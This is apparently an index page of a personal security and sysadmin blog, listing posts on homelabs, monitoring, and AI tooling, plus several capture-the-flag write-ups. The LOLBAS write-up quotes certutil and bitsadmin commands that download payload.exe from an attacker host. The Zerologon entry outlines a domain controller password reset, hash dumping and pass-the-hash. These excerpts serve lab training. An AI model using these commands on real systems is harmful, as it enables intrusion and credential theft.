argv.cloud

Did I actually build this website?

Fri, 20 Mar 2026 00:00:00 +0000

How (And why) I overhauled my website, and thoughts on using AI to accomplish it.

† Black Metal Terminal †

Thu, 12 Mar 2026 00:00:00 +0000

Setting up a minimalistic black metal theme in MacOS/Linux with Base16 Black Metal themes

Understanding Ansible Semaphore by Building a Hardening Audit Pipeline with Lynis, and Prometheus

Fri, 12 Dec 2025 00:00:00 +0000

Building an automated Linux hardening audit pipeline using Ansible Semaphore, Lynis, and Prometheus

An Agentic Workflow for YARA-L: Automatic Rule Generation with Gemini CLI and Chronicle

Fri, 05 Dec 2025 00:00:00 +0000

This is a small framework I put together to generate YARA-L detection rules with an LLM in a self-correcting feedback loop. It aims at automating Detection Engineering for Google SecOps (Chronicle)

Architecture overview: Designing a Self-Managing Linux Fleet

Sat, 22 Nov 2025 00:00:00 +0000

I needed an All-Terrain Linux fleet that could take care of itself: configure, monitor, patch, and protect itself across any environment. This post covers the architecture I designed to make that happen.

Agentic Sysadmin. No Playbooks, No YAML

Fri, 21 Nov 2025 00:00:00 +0000

This post shows the minimal proof of concept SSH tool I built for Opencode AI, and how it could be used to “talk to” remote machines.

Firewall Inception: My pfSense Lab with Proxmox, Cloudflared, and Tailscale

Mon, 25 Aug 2025 00:00:00 +0000

A simple pfSense ACL project turned into a homelab adventure: Proxmox networking, Cloudflared proxying, and Tailscale inception for remote access.

Building a Remote SDR “Observatory” with Proxmox and Tailscale

Thu, 14 Aug 2025 00:00:00 +0000

I turned an RTL-SDR dongle in my homelab into a full-time, remote-access RF observatory. This guide covers setting up a Proxmox VM as an SDR server with rtl_tcp, securing it over Tailscale, and streaming signals to GQRX from anywhere in the world.

Linux Iptables quick reference

Sat, 12 Jul 2025 00:00:00 +0000

iptables in 5 Minutes: a quick cheat-sheet for quick rule edits, safe testing, and making changes stick, without tripping over firewalld, UFW, or nftables.

Coding with AI: faster than ever, but a bit dumber. MIT explains why

Fri, 27 Jun 2025 00:00:00 +0000

I used AI to learn Golang in 2025. I was faster than ever, but couldn’t remember what I’d written. A recent MIT study explains why.

MacOS Setup for Efficiency | Part 1: Raycast

Fri, 27 Jun 2025 00:00:00 +0000

Intro and Raycast showcase

Bash History Expansion and Prompt Magic

Wed, 25 Jun 2025 21:48:05 -0600

Interesting and useful use cases of !, #, and ? expansions in Bash

Booting a private AWS EC2 instance with Tailscale

Thu, 26 Jun 2025 00:00:00 +0000

Booting up an AWS EC2 Instance with Tailscale baked in for a quick homelab testing environment

DoS by playing Janet Jackson: CVE 2022‑38392

Thu, 26 Jun 2025 00:00:00 +0000

Denial of Service by playing Janet Jackson’s “Rhythm Nation”

Debian Linux Post-installation setup

Thu, 19 Jun 2025 21:40:17 -0600

Debian Linux post-installation checklist: Basic installations and configurations for Terminals, Networking, utilities, etc.

Who's monitoring my monitoring Infrastructure? Desigining for observability with Grafana stack

Tue, 10 Jun 2025 00:00:00 +0000

In this post, I go through the design process of setting up a monitoring stack with Grafana and Prometheus, along with a couple of Prometheus custom node exportes, inside a Tailscale network, to monitor a SIEM collection infrastructure stack.

Link to Github repository:

[]

My Current Workflow

Thu, 29 May 2025 09:44:45 -0600

My current workflow and overall setup in Linux, MacOS and Windows.

☕️ Cold Brew Recipe

Thu, 29 May 2025 04:10:31 -0600

Recipe for a nice cold brew coffee concentrate

Logs as Code: Building Iris

Tue, 08 Apr 2025 00:00:00 +0000

A weekend project turned into Project Iris - A serverless ETL pipeline that bridges the gap between modern vulnerability management and SIEM platforms. This first post dives into the first decisions, challenges, and lessons learned in building a cost-effective, secure, and scalable solution using Google Cloud Platform.

SSH Tunneling and Port-Forwarding guide

Sun, 06 Apr 2025 00:00:00 +0000

A brief SSH tunneling & proxy methods guide - Dynamic, Remote & Local port-forwarding. Tunneling and Hardening resources.

Red Team Phishing infrastructure + payload setup

Sat, 01 Feb 2025 00:00:00 +0000

Buildout of an OSPEC prepared Phishing infrastructure as well as FUD decoys and payloads.

Termbot Use Cases

Thu, 09 Jan 2025 00:00:00 +0000

Useful ways to leverage Termbot as a Linux CLI LLM tool. From piping/redirecting stdout to reading text from local files, it allows for several combinations of “data chaining”

CSPM Pt 1 Deepfence Threatmapper Installation & Tests

Sun, 11 Aug 2024 00:00:00 +0000

I’m installing and testing Deepfence’s Threatmapper for the first time, an Open Source Cloud Native Application Protection Platform (CNAPP) - To test it against some use cases and understand it a bit better.

Azure Service Principal Automation

Sat, 25 May 2024 00:00:00 +0000

Quick script to create a Service Principal (Enterprise App) with Global Reader / Viewer on a specified Azure Subscription

About Weaver

Tue, 21 May 2024 00:00:00 +0000

Weaver is a tool I made for extracting saved acticles from pocket, with a specific tag, and summarize them with OpenAI GPT-4. This way I can save blog posts, documentation, etc. And periodically use Weaver to extract summaries of all of them at once.

Termbot

Fri, 22 Mar 2024 00:00:00 +0000

Termbot is a command-line interface tool for conveniently interacting with OpenAI’s GPT-X or Groq’s natural language processing system, directly from your terminal. It allows the user to use standard ChatGPT-like question/answer functionality, with added flexibility such as interacting with local file contents, sending large data from STDIN, using custom local instructions, and more.

SSH Config File - Quick Connection

Thu, 15 Feb 2024 00:00:00 +0000

Using aliases with SSH for quick & easy connections

PNG to Favicon.ico with ffmpeg

Tue, 13 Feb 2024 00:00:00 +0000

Quick how-to: Create favicon.ico from PNG by using FFMPEG

Active Directory Houndsquad

Sun, 15 Oct 2023 00:00:00 +0000

Exploring the Active Directory Houndsquad: BloodHound/Sharphound, PlumHound, and GoodHound for Red and Blue Team operations.

Setting up TLS in MS Windows RDP

Wed, 15 Feb 2023 00:00:00 +0000

The process of setting up TLS in Microsoft Windows Remote Desktop Services. No certificate verification Server or Revocation lists are taken into account.

A proposed new way of reading books

Mon, 12 Dec 2022 00:00:00 +0000

Of all the reading techniques and tips I’ve seen and tried over the years like Speed reading techniques, Feynman Technique, Flash Cards / Notecards, etc. Nothing has actually sticked with me. Here, I proposed a new way, that has helped me develop a deeper comprehension and higher engagement while reading.

CTF Writeup - Breaching AD

Sat, 16 Jul 2022 00:00:00 +0000

NTLM & NetNTLM

Web NetNTLM Server: http://ntlmauth.za.tryhackme.com/

Uses a web-based identification (Challenge-response authentication) to relay the auth mechanism. From the provided script, a Requests module is imported:

from requests_ntlm import HttpNtlmAuth

With the method (function):

requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))

Password Spraying

Using the already built script to authenticate to the web NetNTLM:

LDAP Bind Credentials

Lightweight Authentication protocol → Used by third-parties (Non-MS) to authenticate other services (Jenkins, Git Servers, Web Apps, Printers, VPNs, etc.) to Domains.

CTF Writeup - Zerologon Exploitation

Sat, 18 Jun 2022 00:00:00 +0000

Process, commands & Programs

Process

Direct access to Domain Controller
Enumeration with nmap (Discovered the IP given is indeed a DC)
Applied zerologon_tester to find out if DC is vulnerable
Applied zerologon.py to reset the password to zero values
Used impacket’s secretsdump.py to dump all the hashes (Admin hash), with the parameter “—no-pass”
Used evil-winrm to access and pass the hash to the server

Programs

evil-winrm
secretsdump (impacket)
zerologon (& Source)

PoCs

CTF Writeup - Tech Support

Mon, 25 Apr 2022 00:00:00 +0000

TryHackMe | Tech_Supp0rt: 1

💡 Enumerate, enumerate, enumerate:

Reconnaissance

Ports open:

22
80
139
445 Finding a publicly exposed SMB share with smbmap, and connecting to it via smbclient:

# Enumeration
smbmap -H <ip>
# Connection & Retrieval of file/s
smbclient \\\\host\share

Interesting file found with encoded credentials, and using cyberchef’s magic decoding we get the password for a user (We don’t know yet what service credentials is this)

CTF Writeup - Intrusion Detection

Wed, 13 Apr 2022 00:00:00 +0000

TryHackMe | Intrusion Detection

💡 Attacking Grafana & testing Wazuh HIDS & Suricata NIDS

CTF Writeup - LOLBAS

Tue, 12 Apr 2022 00:00:00 +0000

TryHackMe | Cyber Security Training

LOLBAS

WIndows version of GTFObins

#1: Certutil

certutil

https://attack.mitre.org/techniques/T1105/

# Download from remote:
certutil -URLcache -split -f http://10.0.0.13/payload.exe C:\Windows\Temp\payload.exe
# Another command for encoding payloads locally:
certutil -encode payload.exe Encoded-payload.txt

#2: BITSadmin

Download, execute, copy, ADS

bitsadmin

bitsadmin | LOLBAS

https://attack.mitre.org/techniques/T1197/

bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe

#3: Findstr

findstr

findstr | LOLBAS

# Download from SMB SHared folders on the same Network
findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe

File Execution

Signed Binary Proxy Execution or **Indirect Command Execution: Leveraging other programs to execute malicious programs.**

CTF Writeup - Brainpan

Fri, 01 Apr 2022 00:00:00 +0000

Tryhackme writeup: Brainpan" Brainpan is part of the “Offensive Pentesting Path” in TryHackMe, and it is a straight-forward buffer overflow activity with further extra steps to achieve full privilege escalation.

Linux User switching with their own password

Thu, 23 Sep 2021 00:00:00 +0000

A procedure to allow users to switch (su) to another user, using their own password instead of the “target” user password

Running NetworkMiner on Linux

Tue, 10 Aug 2021 00:00:00 +0000

Using Mono utility to run NetworkMiner, a Windows utility for PCAP analysis

CTF Writeup - Alienphish Challenge

Mon, 26 Apr 2021 00:00:00 +0000

This CTF was part of the event hosted at ctf.hackthebox.eu “Cyberapocalypse”. Mission: Find a payload and a flag inside “Alien Weaknesses.pptx”